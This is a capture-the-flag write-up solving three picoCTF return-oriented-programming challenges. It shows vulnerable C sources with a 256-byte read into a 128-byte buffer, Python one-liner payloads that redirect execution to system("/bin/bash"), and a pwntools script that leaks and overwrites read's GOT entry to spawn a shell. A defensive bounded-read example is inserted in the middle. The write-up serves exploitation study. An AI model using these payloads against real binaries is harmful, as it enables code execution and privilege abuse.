
[Pico] ROP 1, 2, 3


ROP 1        <= problem 1

ROP 2        <= problem 2

ROP 3        <= problem 3


I wanted to solve #4 as well, but that problem has changed. It says you can do such-and-such from some directory, but no such directory exists and they didn't even give an ssh address -_-


Anyway, here goes. They're really easy.



ROP1


#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int not_called() {
    return system("/bin/bash");
}

void vulnerable_function() {
    char buf[128];
    read(STDIN_FILENO, buf, 256);
}

void be_nice_to_people() {
    // /bin/sh is usually symlinked to bash, which usually drops privs. Make
    // sure we don't drop privs if we exec bash, (ie if we call system()).
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
}

int main(int argc, char** argv) {
    be_nice_to_people();
    vulnerable_function();
    write(STDOUT_FILENO, "Hello, World\n", 13);
}



The code is roughly this. Is there anything to do here? Just get not_called called and you're done.


(python -c 'print "A"*140 + "\xa4\x84\x04\x08"';cat) | ./ROP1
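All three challenge binaries share the same defect: vulnerable_function reads 256 bytes into a 128-byte stack buffer, and `#undef _FORTIFY_SOURCE` switches off the glibc check that would otherwise trap the oversized read() at run time. As an added example (not the challenge code), here is a bounded replacement that takes the length from the buffer's own size, driven through a pipe with a constructed 256-byte input so the truncation is visible; bounded_read, feed_and_read and BUF_SZ are names chosen for this example.

```c
/* Added example: bounded counterpart to the challenge's vulnerable_function.
 * The CTF code calls read(STDIN_FILENO, buf, 256) on a char buf[128]; here the
 * length argument is derived from the buffer, so a 256-byte input is cut at 128. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUF_SZ 128   /* same buffer size as the challenge binaries */

/* Read until `cap` bytes arrive or the stream ends; never past the buffer. */
ssize_t bounded_read(int fd, char *buf, size_t cap) {
    size_t total = 0;
    while (total < cap) {
        ssize_t n = read(fd, buf + total, cap - total);
        if (n <= 0)
            break;           /* EOF or error: stop, do not guess */
        total += (size_t)n;
    }
    return (ssize_t)total;
}

/* Push `len` bytes of 'A' (constructed input, sized like the CTF payload)
 * through a pipe into a BUF_SZ stack buffer via bounded_read.
 * Returns how many bytes the bounded reader accepted. */
ssize_t feed_and_read(size_t len) {
    int fds[2];
    if (pipe(fds) != 0)
        return -1;
    char *payload = malloc(len);
    if (payload == NULL)
        return -1;
    memset(payload, 'A', len);
    write(fds[1], payload, len);
    close(fds[1]);           /* writer done: reader sees EOF after the data */

    char buf[BUF_SZ];
    ssize_t got = bounded_read(fds[0], buf, sizeof buf);

    close(fds[0]);
    free(payload);
    return got;
}

int main(void) {
    printf("%zd of 256 bytes accepted\n", feed_and_read(256));  /* 128 */
    return 0;
}
```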




ROP2


#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char * not_used = "/bin/bash";

int not_called() {
    return system("/bin/date");
}

void vulnerable_function() {
    char buf[128];
    read(STDIN_FILENO, buf, 256);
}

void be_nice_to_people() {
    // /bin/sh is usually symlinked to bash, which usually drops privs. Make
    // sure we don't drop privs if we exec bash, (ie if we call system()).
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
}

int main(int argc, char** argv) {
    be_nice_to_people();
    vulnerable_function();
    write(STDOUT_FILENO, "Hello, World\n", 13);
}


This one also differs a bit from the previous one, hmm,,


There is a system function and the "/bin/bash" string is provided, so you just chain the two together.


(python -c 'print "A"*140 + "\xa0\x83\x04\x08"+"ABCD"+"\x10\x86\x04\x08"';cat)|./ROP2



ROP3


#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void vulnerable_function() {
    char buf[128];
    read(STDIN_FILENO, buf, 256);
}

void be_nice_to_people() {
    // /bin/sh is usually symlinked to bash, which usually drops privs. Make
    // sure we don't drop privs if we exec bash, (ie if we call system()).
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
}

int main(int argc, char** argv) {
    be_nice_to_people();
    vulnerable_function();
    write(STDOUT_FILENO, "Hello, World\n", 13);
}



?? You might pause over this at first sight, but those of us who have solved the ROP dinosaur (Ropasaurusrex) problem can do it easily.


It's a read_got overwrite using read and write.



from pwn import *

PPPR      = 0x804855d      # pop; pop; pop; ret gadget (clears three call arguments)
read_plt  = 0x08048360
read_got  = 0x0804a000
write_plt = 0x080483a0
bss       = 0x0804a020
offset    = 0x99a10        # distance between read and system in the target libc
binsh     = "/bin/sh"
len_binsh = len(binsh)

p = remote("localhost", 9906)

pay = "A"*140
pay += p32(read_plt)+p32(PPPR)+p32(0)+p32(bss)+p32(len_binsh)   # read(0, bss, 7)       => write "/bin/sh" into bss
pay += p32(write_plt)+p32(PPPR)+p32(1)+p32(read_got)+p32(4)     # write(1, read_got, 4) => print read's GOT entry
pay += p32(read_plt)+p32(PPPR)+p32(0)+p32(read_got)+p32(4)      # read(0, read_got, 4)  => overwrite read's GOT entry with system
pay += p32(read_plt)+"ABCD"+p32(bss)                            # read@plt now jumps to system => system(bss) => system("/bin/sh")

print "Send Exploit : %s" % pay
p.send(pay)

print "Send /bin/sh : %s" % binsh
p.send(binsh)
sleep(1)

print "Receiving"
tm = p.recv(4)
print "Receive Complete!"
print "read_got : %x" % u32(tm)

sys = u32(tm) - offset
print "system : %x" % sys

p.send(p32(sys))
sleep(0.3)
print "Send system"

p.sendline("id")
sleep(1)
print p.recvline()

p.interactive()



I just took the code from the ROP dinosaur problem and changed the addresses,,,,






And that's it. I'd still like to solve #4.


